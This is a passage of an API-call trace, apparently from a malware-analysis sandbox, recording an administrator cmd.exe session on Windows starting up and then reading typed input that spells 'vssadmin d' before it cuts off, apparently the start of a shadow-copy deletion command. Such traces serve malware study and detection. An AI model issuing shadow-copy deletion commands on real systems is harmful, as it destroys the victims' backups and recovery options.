[0135.945] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0135.945] malloc (_Size=0xffce) returned 0x27a549b0080 [0135.945] ??_V@YAXPEAX@Z () returned 0x27a549b0080 [0135.946] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.946] malloc (_Size=0xffce) returned 0x27a549c0060 [0135.946] ??_V@YAXPEAX@Z () returned 0x27a549c0060 [0135.947] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x27a549c0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0135.947] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0135.947] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0135.947] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.947] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0135.947] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0135.947] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0135.947] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0135.947] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0135.947] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0135.947] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0135.947] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0135.947] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0135.947] GetProcessHeap () returned 0x27a547e0000 [0135.947] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e64a0) returned 1 [0135.947] GetEnvironmentStringsW () returned 0x27a547e5a10* [0135.947] GetProcessHeap () returned 0x27a547e0000 [0135.948] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xa94) returned 0x27a547e7a10 [0135.948] FreeEnvironmentStringsA (penv="A") returned 1 [0135.948] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0135.948] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0135.948] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0135.948] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0135.948] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0135.948] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0135.948] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0135.948] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0135.948] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0135.948] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0135.948] malloc (_Size=0xffce) returned 0x27a549d0040 [0135.948] ??_V@YAXPEAX@Z () returned 0x27a549d0040 [0135.949] GetProcessHeap () returned 0x27a547e0000 [0135.949] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x38) returned 0x27a547e84b0 [0135.949] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549d0040 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.949] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x7fe7, lpBuffer=0x27a549d0040, lpFilePart=0x8dc3d4f330 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x8dc3d4f330*="system32") returned 0x13 [0135.950] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0135.950] FindFirstFileW (in: lpFileName="C:\\WINDOWS", lpFindFileData=0x8dc3d4f060 | out: lpFindFileData=0x8dc3d4f060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x27a547e84f0 [0135.950] FindClose (in: hFindFile=0x27a547e84f0 | out: hFindFile=0x27a547e84f0) returned 1 [0135.950] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x8dc3d4f060 | out: lpFindFileData=0x8dc3d4f060*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x8187ef5e, ftLastAccessTime.dwHighDateTime=0x1d4d5d3, ftLastWriteTime.dwLowDateTime=0x8187ef5e, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x27a547e84f0 [0135.950] FindClose (in: hFindFile=0x27a547e84f0 | out: hFindFile=0x27a547e84f0) returned 1 [0135.950] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0135.950] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0135.950] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0135.950] GetProcessHeap () returned 0x27a547e0000 [0135.950] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e7a10) returned 1 [0135.950] GetEnvironmentStringsW () returned 0x27a547e84f0* [0135.950] GetProcessHeap () returned 0x27a547e0000 [0135.950] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0xac4) returned 0x27a547e5a10 [0135.950] FreeEnvironmentStringsA (penv="=") returned 1 [0135.950] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.950] GetProcessHeap () returned 0x27a547e0000 [0135.951] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e84b0) returned 1 [0135.951] ??_V@YAXPEAX@Z () returned 0x1 [0135.951] ??_V@YAXPEAX@Z () returned 0x1 [0135.951] GetProcessHeap () returned 0x27a547e0000 [0135.951] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x4016) returned 0x27a547e7a10 [0135.951] GetProcessHeap () returned 0x27a547e0000 [0135.951] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e7a10) returned 1 [0135.951] GetConsoleOutputCP () returned 0x1b5 [0135.972] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6de08fbb0 | out: lpCPInfo=0x7ff6de08fbb0) returned 1 [0135.972] GetUserDefaultLCID () returned 0x409 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff6de08bb78, cchData=8 | out: lpLCData=":") returned 2 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x8dc3d4f6f0, cchData=128 | out: lpLCData="0") returned 2 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x8dc3d4f6f0, cchData=128 | out: lpLCData="0") returned 2 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x8dc3d4f6f0, cchData=128 | out: lpLCData="1") returned 2 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff6de08bb68, cchData=8 | out: lpLCData="/") returned 2 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff6de08bb00, cchData=32 | out: lpLCData="Mon") returned 4 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff6de08bac0, cchData=32 | out: lpLCData="Tue") returned 4 [0135.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff6de08ba80, cchData=32 | out: lpLCData="Wed") returned 4 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff6de08ba40, cchData=32 | out: lpLCData="Thu") returned 4 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff6de08ba00, cchData=32 | out: lpLCData="Fri") returned 4 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff6de08b9c0, cchData=32 | out: lpLCData="Sat") returned 4 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff6de08b980, cchData=32 | out: lpLCData="Sun") returned 4 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff6de08bb58, cchData=8 | out: lpLCData=".") returned 2 [0135.973] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff6de08bb40, cchData=8 | out: lpLCData=",") returned 2 [0135.973] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0135.974] GetProcessHeap () returned 0x27a547e0000 [0135.974] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x0, Size=0x20c) returned 0x27a547e6550 [0135.974] GetConsoleTitleW (in: lpConsoleTitle=0x27a547e6550, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0135.975] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.975] GetFileType (hFile=0x254) returned 0x3 [0135.975] ApiSetQueryApiSetPresence () returned 0x0 [0135.975] ResolveDelayLoadedAPI () returned 0x7ffe62c3d990 [0135.977] BrandingFormatString () returned 0x27a547e6c20 [0135.983] GetVersion () returned 0x3ad7000a [0135.983] _vsnwprintf (in: _Buffer=0x8dc3d4f850, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x8dc3d4f7e8 | out: _Buffer="10.0.15063") returned 10 [0135.983] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.983] GetFileType (hFile=0x254) returned 0x3 [0135.983] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6de097f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0135.984] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x7ff6de097f60, nSize=0x2000, Arguments=0x8dc3d4f7f0 | out: lpBuffer="Microsoft Windows [Version 10.0.15063]") returned 0x26 [0135.984] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.984] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 10.0.15063]", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 10.0.15063]", lpUsedDefaultChar=0x0) returned 39 [0135.984] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x8dc3d4f748, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f748*=0x26, lpOverlapped=0x0) returned 1 [0135.984] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x8dc3d4f818 | out: _Buffer="\r\n") returned 2 [0135.984] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.984] GetFileType (hFile=0x254) returned 0x3 [0135.984] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.984] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.984] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x8dc3d4f7e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f7e8*=0x2, lpOverlapped=0x0) returned 1 [0135.984] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="%s", _ArgList=0x8dc3d4f818 | out: _Buffer="(c) 2017 Microsoft Corporation. All rights reserved.") returned 52 [0135.984] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.984] GetFileType (hFile=0x254) returned 0x3 [0135.984] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.984] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="(c) 2017 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="(c) 2017 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 53 [0135.984] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x8dc3d4f7e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f7e8*=0x34, lpOverlapped=0x0) returned 1 [0135.984] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x8dc3d4f818 | out: _Buffer="\r\n") returned 2 [0135.985] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.985] GetFileType (hFile=0x254) returned 0x3 [0135.985] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.985] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.985] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x8dc3d4f7e8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f7e8*=0x2, lpOverlapped=0x0) returned 1 [0135.985] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffe6b4d0000 [0135.985] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="CopyFileExW") returned 0x7ffe6b4ee830 [0135.985] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="IsDebuggerPresent") returned 0x7ffe6b4ee300 [0135.985] GetProcAddress (hModule=0x7ffe6b4d0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffe67f50a40 [0135.985] ??_V@YAXPEAX@Z () returned 0x1 [0135.985] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.985] GetFileType (hFile=0x248) returned 0x3 [0135.985] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0135.985] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x8dc3d4f658 | out: TokenHandle=0x8dc3d4f658*=0x0) returned 0xc000007c [0135.986] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x8dc3d4f658 | out: TokenHandle=0x8dc3d4f658*=0x94) returned 0x0 [0135.986] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x12, TokenInformation=0x8dc3d4f608, TokenInformationLength=0x4, ReturnLength=0x8dc3d4f610 | out: TokenInformation=0x8dc3d4f608, ReturnLength=0x8dc3d4f610) returned 0x0 [0135.986] NtQueryInformationToken (in: TokenHandle=0x94, TokenInformationClass=0x1a, TokenInformation=0x8dc3d4f610, TokenInformationLength=0x4, ReturnLength=0x8dc3d4f608 | out: TokenInformation=0x8dc3d4f610, ReturnLength=0x8dc3d4f608) returned 0x0 [0135.986] NtClose (Handle=0x94) returned 0x0 [0135.986] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x8dc3d4f620, nSize=0x0, Arguments=0x8dc3d4f628 | out: lpBuffer="渰呾ɺ") returned 0xf [0135.986] GetProcessHeap () returned 0x27a547e0000 [0135.986] RtlAllocateHeap (HeapHandle=0x27a547e0000, Flags=0x8, Size=0x218) returned 0x27a547e8bb0 [0135.986] GetConsoleTitleW (in: lpConsoleTitle=0x8dc3d4f670, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0135.986] wcsstr (_Str="C:\\WINDOWS\\system32\\cmd.exe", _SubStr="Administrator: ") returned 0x0 [0135.986] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\system32\\cmd.exe") returned 1 [0135.988] GetProcessHeap () returned 0x27a547e0000 [0135.988] RtlFreeHeap (HeapHandle=0x27a547e0000, Flags=0x0, BaseAddress=0x27a547e8bb0) returned 1 [0135.988] LocalFree (hMem=0x27a547e6e30) returned 0x0 [0135.988] _vsnwprintf (in: _Buffer=0x7ff6de097f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x8dc3d4f498 | out: _Buffer="\r\n") returned 2 [0135.988] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.988] GetFileType (hFile=0x254) returned 0x3 [0135.988] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.988] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0135.988] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x8dc3d4f468, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f468*=0x2, lpOverlapped=0x0) returned 1 [0135.988] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6de08bb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0135.988] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x27a549b0080 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0135.988] malloc (_Size=0x107ce) returned 0x27a549c0060 [0135.989] _vsnwprintf (in: _Buffer=0x27a549c0060, _BufferCount=0x83e5, _Format="%s", _ArgList=0x8dc3d4f4a8 | out: _Buffer="C:\\WINDOWS\\system32") returned 19 [0135.989] _vsnwprintf (in: _Buffer=0x27a549c0086, _BufferCount=0x83d2, _Format="%c", _ArgList=0x8dc3d4f4a8 | out: _Buffer=">") returned 1 [0135.989] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.989] GetFileType (hFile=0x254) returned 0x3 [0135.989] _get_osfhandle (_FileHandle=1) returned 0x254 [0135.989] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\WINDOWS\\system32>", cchWideChar=-1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\WINDOWS\\system32>", lpUsedDefaultChar=0x0) returned 21 [0135.989] WriteFile (in: hFile=0x254, lpBuffer=0x7ff6de089970*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x8dc3d4f498, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesWritten=0x8dc3d4f498*=0x14, lpOverlapped=0x0) returned 1 [0135.989] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.989] GetFileType (hFile=0x248) returned 0x3 [0135.989] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.989] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.989] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.989] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c30, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0135.989] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.989] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c32, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c34, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c36, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c38, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3a, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.990] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0135.990] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.990] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.990] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c3e, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c40, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x8dc3d4f7f8, lpOverlapped=0x0 | out: lpBuffer=0x7ff6de089970*, lpNumberOfBytesRead=0x8dc3d4f7f8*=0x1, lpOverlapped=0x0) returned 1 [0135.991] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff6de089970, cbMultiByte=1, lpWideCharStr=0x7ff6de093c42, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0135.991] _get_osfhandle (_FileHandle=0) returned 0x248 [0135.991] SetFilePointer (in: hFile=0x248, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.991] ReadFile (in: hFile=0x248, lpBuffer=0x7ff6de089970, nNumberOfBytesToRead=0x1, 